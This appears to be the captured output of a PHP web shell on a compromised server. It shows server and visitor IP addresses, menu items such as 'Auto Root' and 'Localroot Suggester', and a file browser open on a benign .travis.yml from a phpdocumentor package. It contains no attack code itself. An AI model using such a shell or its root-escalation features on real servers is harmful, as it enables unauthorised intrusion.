Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.219.151.249
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
3 /
phpdocumentor /
reflection-common /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2017-09-11 09:00
.travis.yml
685
B
-rw-r--r--
2017-09-11 09:00
LICENSE
1.06
KB
-rw-r--r--
2017-09-11 09:00
README.md
163
B
-rw-r--r--
2017-09-11 09:00
composer.json
731
B
-rw-r--r--
2017-09-11 09:00
Save
Rename
language: php php: - 5.5 - 5.6 - 7.0 - 7.1 - hhvm - nightly matrix: allow_failures: - php: - hhvm - nightly cache: directories: - $HOME/.composer/cache script: - vendor/bin/phpunit --coverage-clover=coverage.clover -v - composer update --no-interaction --prefer-source - vendor/bin/phpunit -v before_script: - composer install --no-interaction after_script: - if [ $TRAVIS_PHP_VERSION = '5.6' ]; then wget https://scrutinizer-ci.com/ocular.phar; php ocular.phar code-coverage:upload --format=php-clover coverage.clover; fi notifications: irc: "irc.freenode.org#phpdocumentor" email: - me@mikevanriel.com - ashnazg@php.net